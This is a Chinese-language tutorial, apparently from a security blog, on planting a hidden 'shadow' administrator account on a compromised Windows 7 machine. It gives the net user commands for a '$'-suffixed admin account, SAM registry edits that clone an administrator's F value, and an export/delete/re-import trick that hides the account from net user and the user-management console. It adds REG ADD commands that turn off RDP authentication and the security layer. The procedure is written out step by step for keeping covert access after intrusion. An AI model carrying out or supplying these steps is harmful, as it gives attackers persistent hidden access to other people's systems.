windows创建影子账户

前提：创建影子账户再已经getshell并且可以使用system权限（直接远端更好）

这里用win7做演示，本来是想用win10做实验的，但是win10是一个家庭版的，虽然用OSSQ转换成了专业版，但是最后用命令虽然显示命令完成，但还是无法开启3389。😵

需要远程上去，远程的话看另一篇文章😚

先创建一个管理员权限的隐藏账户（在账户名后跟一个$）

这里就需要system权限，administrator权限都不能创建用户

net user 98k$ admiN@123 /add

net localgroup administrators 98k$ /add

这里创建的账户用net user是看不到的，但是可以在本地用户和组lusrmgr.msc或compmgmt.msc里看到。

接下来win+R输入regedit打开注册表，找到SAM这个文件夹，具体位置如下；需要将这个文件夹的权限都赋予administrator，然后重新打开，就可以看到用户的注册表信息了。

之后访问一下我们刚创建的用户98k$,查看这文件中对于的字段，和上面的文件夹名称对应。

再找到administrator的对应文件夹，将其中F文件的字段值复制出来，替换掉刚刚我们创建的用户的字段值。

然后分别将Users和Names下的用户文件导出。（导出到桌面好找）

到命令行（记得用管理员权限打开）输入命令将刚刚创建的用户删除。

net user 98k$ /del

再找到刚刚我们导出的两个文件，双击分别再将他们导入到注册表。

此时再重新打开注册表，可以发现刚刚创建的用户还在，但是在本地用户和组以及net user命令中看不到该账户的存在，说明创建用户成功了。🌈🌈🌈

补充加更正！

​ 1. 之前说的用Administrator账户继续创建影子账户，在后续的利用过程中发现并不好使，原因是在新的win7以及后续的win10等版本中，administrator账户是被禁用的状态，无法远程登录（正常登录都登不上）

​ 所以需要将一个其他具有管理员权限的账户的F值复制到影子账户的F值下！！！！

2. 在某些情况下（很小的情况下），密码不正确会被直接挡在门外（远程的界面都打不开）原因和解决：

   鉴权开启时，我们在不知道账号密码的情况下无法登录到远程界面，但是鉴权关闭之后，无论我们输入的账号和密码是否正确，都可以进入远程界面窗口。

   如何关闭鉴权模式，我们采用如下命令：

   REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0

   0代表关闭，1代表开启

   关闭鉴权模式还不够，还需要关闭securitylayer安全层验证 ：

   具体指：0 就是连接前使用 rdp 协议进行身份验证，rdp 即远程桌面连接，可以简单理解为就是关闭验证。1 是指在连接前两端协商来进行身份验证，这个是默认值。2 就是使用 tls 协议来进行。

   将其参数设置为0，命令如下：

   REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0